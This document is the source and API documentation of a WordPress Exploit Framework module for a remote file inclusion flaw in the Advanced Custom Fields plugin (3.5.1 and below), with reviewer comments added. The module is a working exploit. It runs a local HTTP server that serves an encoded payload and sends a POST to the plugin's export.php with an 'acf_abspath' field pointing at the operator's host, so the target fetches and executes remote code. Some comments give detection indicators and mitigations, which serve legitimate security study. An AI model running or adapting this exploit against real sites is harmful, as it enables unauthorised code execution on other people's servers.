class Wpxf::Exploit::AdvancedCustomFieldsRemoteFileInclusion

Public Class Methods

new()
Calls superclass method Wpxf::Net::HttpServer::new
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 7
# Builds the module: registers its descriptive metadata and the two options
# that describe the HTTP endpoint the inclusion request will point at.
#
# Per the description registered here, the issue affects Advanced Custom
# Fields 3.5.1 and below and is only reachable when PHP's
# "allow_url_include" is enabled, which is disabled by default. Keeping that
# setting off and upgrading the plugin are the mitigations the text implies.
def initialize
  super

  credited_authors = [
    'Charlie Eriksen <charlie[at]ceriksen.com>', # Vulnerability disclosure
    'rastating'                                  # WPXF module
  ]
  advisory_references = [
    ['URL', 'http://secunia.com/advisories/51037/'],
    ['WPVDB', '6103']
  ]

  update_info(
    name: 'Advanced Custom Fields Remote File Inclusion',
    desc: 'The Advanced Custom Fields plugin, in versions 3.5.1 and below, '\
          'allows for remote file inclusion and remote code execution via '\
          'the export.php script. This exploit only works when the PHP '\
          'option "allow_url_include" is enabled (disabled by default).',
    author: credited_authors,
    references: advisory_references,
    date: 'Nov 14 2012'
  )

  # Address placed in the included URL; it has no default, so the operator
  # must supply it.
  host_option = StringOption.new(
    name: 'rfi_host',
    desc: 'The address of the host listening for a connection',
    required: true
  )

  # The default path is a fresh 8-character value from
  # Utility::Text.rand_alpha, generated when the module is constructed.
  path_option = StringOption.new(
    name: 'rfi_path',
    desc: 'The path to access via the remote file inclusion request',
    default: Utility::Text.rand_alpha(8),
    required: true
  )

  register_options([host_option, path_option])
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 46
# Version check for the Advanced Custom Fields plugin.
#
# Hands the plugin slug and the version string '3.5.2' to
# check_plugin_version_from_readme and returns its result unchanged. The
# module description lists 3.5.1 and below as affected, so '3.5.2' is
# presumably the first fixed release -- confirm against the helper's contract.
def check
  slug = 'advanced-custom-fields'
  version_bound = '3.5.2'
  check_plugin_version_from_readme(slug, version_bound)
end
on_http_request(path, params, headers)
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 62
# Produces the response body for a request to the module's HTTP server
# (presumably invoked as a callback by the HTTP server mixin -- confirm).
#
# NOTE(review): path, params and headers are not inspected, so every request
# gets the same body regardless of the configured rfi_path or who is asking.
#
# @return the encoded form of the configured payload
def on_http_request(path, params, headers)
  response_body = payload.encoded
  response_body
end
plugin_url()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 42
# URL of the Advanced Custom Fields plugin directory on the target site,
# built by joining the site's plugins URL with the plugin slug.
def plugin_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'advanced-custom-fields')
end
rfi_host()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 50
# Value of the 'rfi_host' option, as returned by normalized_option_value.
def rfi_host
  option_name = 'rfi_host'
  normalized_option_value(option_name)
end
rfi_path()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 54
# Value of the 'rfi_path' option, as returned by normalized_option_value.
def rfi_path
  option_name = 'rfi_path'
  normalized_option_value(option_name)
end
rfi_url()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 58
# Full URL that is sent as the inclusion target: rfi_host, the HTTP server's
# bind port and rfi_path joined together.
#
# NOTE(review): the scheme is fixed to plain http, and rfi_path is appended
# after a literal '/', so a path that already starts with '/' yields '//'.
def rfi_url
  format('http://%s:%s/%s', rfi_host, http_server_bind_port, rfi_path)
end
run()
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 70
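# Runs the module: starts the local HTTP server, sends one POST to
# vulnerable_url with 'acf_abspath' set to rfi_url, stops the server again
# and reports on the response.
#
# For defenders, the observable request is a POST to the plugin's
# core/actions/export.php carrying an 'acf_abspath' field that holds an
# http:// URL. The module description lists upgrading past 3.5.1 and keeping
# PHP's allow_url_include disabled as the conditions that remove the issue.
#
# @return [Boolean] false when the superclass run returns a falsy value, no
#   response is received, or the response indicates allow_url_include is
#   off; true otherwise
def run
  return false unless super

  # `true` is passed through unchanged; presumably it requests a
  # non-blocking start so the request below can proceed -- confirm.
  start_http_server(true)

  begin
    emit_info 'Executing request...'
    res = execute_post_request(
      url: vulnerable_url,
      body: {
        'acf_abspath' => rfi_url
      }
    )
  ensure
    # Stop the listener even when the request raises, so the payload
    # endpoint is not left open on the operator's host.
    stop_http_server
  end

  # The response was previously dereferenced before any nil check; bail out
  # with a message rather than failing with NoMethodError.
  if res.nil?
    emit_error 'No response received from the target'
    return false
  end

  # A nil body is treated as empty so the checks below cannot raise.
  body = res.body.to_s

  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{body}", true

  if res.code == 500 || body =~ /allow_url_include/
    emit_error 'allow_url_include appears to be disabled'
    return false
  end

  emit_success "Result: #{body}" if res.code == 200 && !body.strip.empty?

  true
end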
vulnerable_url()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 66
# URL of the plugin's export script (core/actions/export.php under
# plugin_url), which the module description names as the affected endpoint.
def vulnerable_url
  script_segments = %w[core actions export.php]
  normalize_uri(plugin_url, *script_segments)
end